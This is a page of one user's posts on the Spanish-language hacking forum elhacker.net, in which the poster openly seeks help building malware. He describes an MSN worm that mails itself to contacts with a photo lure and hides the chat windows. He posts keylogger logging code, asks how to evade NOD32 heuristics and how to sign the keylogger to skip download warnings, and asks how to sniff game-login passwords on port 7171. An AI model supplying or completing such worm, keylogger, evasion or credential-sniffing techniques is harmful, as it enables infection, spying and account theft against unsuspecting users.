elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16
111  Programación / Programación Visual Basic / Re: Enviar archivos automaticamente por el msn en: 2 Octubre 2007, 16:32 pm
Man estamos en las mismas... Yo tambien me ando creando un Worm que se multiplique por msn.

Mi idea es esta...
Al ejecutar el worm se copia en c:\windows\system32 y tambien se zipea automaticamente con el nombre DSC1504 <--- Aun no se como hacer eso
junto con varias imagenes y se guarda en c:\windows\media o alguna carpeta medio oculta, este sera el archivo que mandaremos via MSN!

Despues abre cada una de las ventanas de la lista de contactos que esten en Online o cualquier otro estado que no sea "NO CONECTADO".

Le manda el archivo zipeado anteriormente y le dice "Ey, aqui estan las fotos de la semana pasada" o algun tipo de mensajes, estaria bien que se escogiera al azar el mensaje de una lista determinada. <----- Tampoco se como hacerlo al azar

Despues oculta la ventana con la funcion
Call ShowWindow(GetForegroundWindow, SW_HIDE)

El proceso de mandar el archivo a los contactos se repite cada 1 hora.
Saludos!....


Si alguien sabe como agregar una imagen a un archivo hecho en vb y que ademas las imagenes se guarden en .zip al ejecutarlo favor de publicarlo, yo le comparto el kilombo del codigo que estoy formando xD


112  Programación / Programación Visual Basic / Re: Ocultar ventanas con cierto nombre... en: 2 Octubre 2007, 15:02 pm
Me acabo de dar cuenta de que ya habia un tema muy parecido a este  :xD....
Pero no se concreto nada, solo hablaron de la Api
FindWindowlike aunque no se como funciona xD

Alguna idea para usar esta funcion y ocultar toda ventana que lleve "Conversa"

Saludos!
113  Programación / Programación Visual Basic / Re: Ocultar ventanas con cierto nombre... en: 2 Octubre 2007, 08:18 am
Mmmm........ no serviria porke si las minimizo la victima podria cancelar facilmente el envio del archivo.

Alguien sabe alguna idea de ocultar ventanas que terminen con cierto texto?
114  Programación / Programación Visual Basic / Ocultar ventanas con cierto nombre... en: 29 Septiembre 2007, 19:47 pm
Hola que tal, tengo una pregunta ya que no se mucho de vb y quiero hacer un worm para msn...
Mi pregunta es, alguien sabe si es posible ocultar las ventanas que tengan un texto en especifico?
Por ejemplo... Si se han fijado en el msn todas las ventanas de conversacion terminan con - Conversation  o - Conversacion.

Entonces queria hacer un codigo que abriera las ventanas de los contactos, mandara un .zip, un texto como "aqui estan las fotos de la semana pasada" y despues ocultara las ventanas...
Que pasaran 3 minutos y las ventanas volvieran a aparecer.
Este margen de 3 minutos es para que los contactos tengan tiempo de aceptar el archivo.

Alguna idea?
115  Programación / Programación Visual Basic / Firma digital en VB en: 6 Septiembre 2006, 01:47 am
Hola, me preguntaba si en VB es posible ponerle una firma digital a una aplicacion por ejemplo.
Cuando bajamos un .exe desde el internet explorer en un Xp con Sp2 que no tiene firma digital nos sale una advertencia preguntando que si queremos ejecutar el archivo a pesar de no tener una firma digital de la compañia que fue hecha.

Tengo un keylogger q hize en Vb y quiero agregarle una firma digital para poder saltarme esa advertencia y que puedan descargar el archivo sin mas obstaculos.
Alguien sabe como puede hacerse lo siguiente?

Muchas gracias.
saludos!
116  Programación / Programación Visual Basic / Matar historial con el iexplore abierto en: 4 Agosto 2006, 07:35 am
Mmmm unas preguntitas complicadas.

Ando haciendo un nuevo proyecto donde necesito mandar informacion oculta con el iexplore pero me encuentro con varios problemas... "El historial del internet explorer"

Como la informacion no viene cifrada entonces facilmente puede verse lo que dice.
Y lo que queria ver era si por medio del VB se puede desactivar el historial de windows o borrar teniendo el iexplore abierto.

Alguna sugerencia?

Gracias.
117  Programación / Programación Visual Basic / Cerrar aplicacion con un titulo especifico. en: 4 Agosto 2006, 07:29 am
Hola, tengo una pregunta...
Les explicare, quiero hacer un programa que cierre los iexplore pero no todos, solo los que digan de titulo por ejemplo

"Google - Microsoft Internet Explorer"
Se puede hacer algo asi?

Y no hay problema si la aplicacion se esta corriendo de manera oculta?
Alguien sabe algo sobre el tema?
Cualquier informacion es bienvenida, gracias!
118  Programación / Programación Visual Basic / Heuristica del NOD en: 29 Julio 2006, 07:23 am
Hola... Postie algo parecido en Troyanos y Virus, pero aqui lo hare mas centrado en esta funcion...

Necesito que me confirmen....
Si en un Modulo tengo estas 2 funciones:

Código:
Public Function FireEvent(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String)
    On Error Resume Next
   
    If strInApplication = strLastApplication Then
      Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, False
     
   Else
      Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, True
      strLastApplication = strInApplication
   End If
   
End Function

Código:
Public Function Tecla_Presionada(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String, ByVal vCambio_De_Aplicacion As Boolean)
        If vCambio_De_Aplicacion Then
        If Not FMain.txt.Text = "" Then
            FMain.txt.Text = FMain.txt.Text & vbNewLine & vbNewLine
        End If
        FMain.txt.Text = FMain.txt.Text & "<hr><b>...:::." & Now & ":::...<br>" & strInApplication & "</b><hr><br>" & vbNewLine
        If bIsFunctionKey Then
            FMain.txt.Text = FMain.txt.Text & strKeyName
        Else
            FMain.txt.Text = FMain.txt.Text & Chr(intKey)
        End If
    Else
        If bIsFunctionKey Then
            FMain.txt.Text = FMain.txt.Text & strKeyName
        Else
            FMain.txt.Text = FMain.txt.Text & Chr(intKey)
        End If
   End If

End Function

Es detectada por la heuristica?

Se puede lograr meter alguna funcion dentro de otra? no verdad?  :huh:

Esto ya me tiene desesperado, no logro burlar la heuristica del NOD!

Se que el problema esta ahi porque si quito alguna parte del code ya no es detectado el EXE pero queda inservible xD
Alguna recomendacion?
Saludos
119  Programación / Programación Visual Basic / Re: Leer datos de la cuenta de un juego por medio de escucha en un puerto en: 23 Mayo 2006, 19:37 pm
xD si! si es tibia hahahaha... Gracias por la respuesta, pero lo malo es que sacan un update lo encriptan diferente o lo hacen mas dificil de descifrar xD asi que buscare otra forma de sacar accs del game.

xD gracias
120  Programación / Programación Visual Basic / Leer datos de la cuenta de un juego por medio de escucha en un puerto en: 11 Abril 2006, 07:48 am
Hola, que tal....
Tenia rato de no postear xD

Mi pregunta era lo siguiente, hay un juego de Rol Online, en donde al abrirlo escribes tu numero de cuenta y tu password, posteriormente estos son mandados a la ip del juego para leer la cuenta y el pass.
Hay programas que cambian la ip del juego para jugar en sus propios servers...

A lo que voy es, se podria hacer una aplicacion que se mantenga a la escucha en el puerto 7171 (puerto del juego) para captar los datos que se manejen y asi capturar la contraseña y la cuenta?

Si alguien tiene alguna idea le pido de favor que me ayude a guiarme para la elaboracion de la aplicacion xD

Gracias!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines